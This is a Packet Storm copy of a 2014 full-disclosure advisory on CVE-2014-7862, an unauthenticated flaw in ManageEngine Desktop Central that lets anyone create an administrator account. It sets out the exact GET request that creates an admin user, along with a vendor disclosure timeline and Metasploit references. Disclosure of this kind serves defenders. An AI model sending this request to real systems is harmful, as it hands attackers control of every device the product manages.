exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Desktop Central Add Administrator

Desktop Central Add Administrator
Posted Dec 31, 2014
Authored by Pedro Ribeiro

Desktop Central versions 7 and forward suffer from an add administrator vulnerability.

tags | exploit, add administrator
advisories | CVE-2014-7862
SHA-256 | c2e77377429f0005eda7b7e387bc4d53931aff42d4cb2b99620c29f7791151c0

Desktop Central Add Administrator

Change Mirror Download
Hi,

This is part 10 of the ManageOwnage series. For previous parts, see [1].

This time we have a vulnerability that allows an unauthenticated user
to create an administrator account, which can then be used to execute
code on all devices managed by Desktop Central (desktops, servers,
mobile devices, etc).
An auxiliary Metasploit module that creates the administrator account
has been released and its currently awaiting review [2]. I will leave
to someone else the task of creating an exploit that executes code on
all managed devices (it's not hard to write but testing it properly
might take a fair few hours).

I am releasing this as a 0 day as 112 days have elapsed since I first
communicated the vulnerability to ManageEngine. I received many
promises about getting updates but they were very evasive (a
disclosure timeline is at the bottom of this email). The full advisory
text is below, and a copy can be obtained from my repo [3].

Regards,
Pedro

>> Administrator account creation in ManageEngine Desktop Central / Desktop Central MSP
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 31/12/2014 / Last updated: 31/12/2014

>> Background on the affected product:
"Desktop Central is an integrated desktop & mobile device management
software that helps in managing the servers, laptops, desktops,
smartphones and tablets from a central point. It automates your
regular desktop management routines like installing patches,
distributing software, managing your IT Assets, managing software
licenses, monitoring software usage statistics, managing USB device
usage, taking control of remote desktops, and more."

This vulnerability is being released as a 0day since ManageEngine
failed to take action after 112 days. See timeline for details.

>> Technical details:
Vulnerability: Administrator account creation (unauthenticated)
CVE-2014-7862
Constraints: none; no authentication or any other information needed
Affected versions: all versions from v7 onwards

GET /servlets/DCPluginServelet?action=addPlugInUser&role=DCAdmin&userName=dcpwn&email=bla@bla.com&phNumber=123456&password=8fR%2bRoOURmY0EXsX%2bCmung%3d=&salt=1401192012599&createdtime=1337

This creates a new administrator user "dcpwn" with the password
"admin". You can now execute code on all devices managed by Desktop
Central!

A Metasploit module that exploits this vulnerability has been released.

>> Fix:
UNFIXED - ManageEngine failed to take action after 112 days.

Timeline of disclosure:
11/09/2014:
- Vulnerability information sent to Romanus, Desktop Central project manager.

23/09/2014:
- Requested an update. Received reply "My development team is working
on this to provide a fix. Let me check this and update you the
status."

17/10/2014
- Requested an update. Received reply on the 19th "Due to festive
season here i'm unable to get the update. Let me find this and update
you by Monday."

30/10/2014
- Requested an update. Received reply "The development and testing of
the reported part should get over in another 3 weeks and when it is
ready for release build I'll send it for testing."

23/11/2014
- Requested an update. Received reply on the 24th "I was traveling
hence couldn't give you an update. It should get released by next
week or early second week. I'll send you an update on this."

31/12/2014
- Released information and exploit 112 days after initial disclosure.


[1]
http://seclists.org/fulldisclosure/2014/Aug/55
http://seclists.org/fulldisclosure/2014/Aug/75
http://seclists.org/fulldisclosure/2014/Aug/88
http://seclists.org/fulldisclosure/2014/Sep/1
http://seclists.org/fulldisclosure/2014/Sep/110
http://seclists.org/fulldisclosure/2014/Nov/12
http://seclists.org/fulldisclosure/2014/Nov/18
http://seclists.org/fulldisclosure/2014/Nov/21
http://seclists.org/fulldisclosure/2014/Dec/9

[2]
https://github.com/rapid7/metasploit-framework/pull/4493

[3]
https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_dc9_admin.txt
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close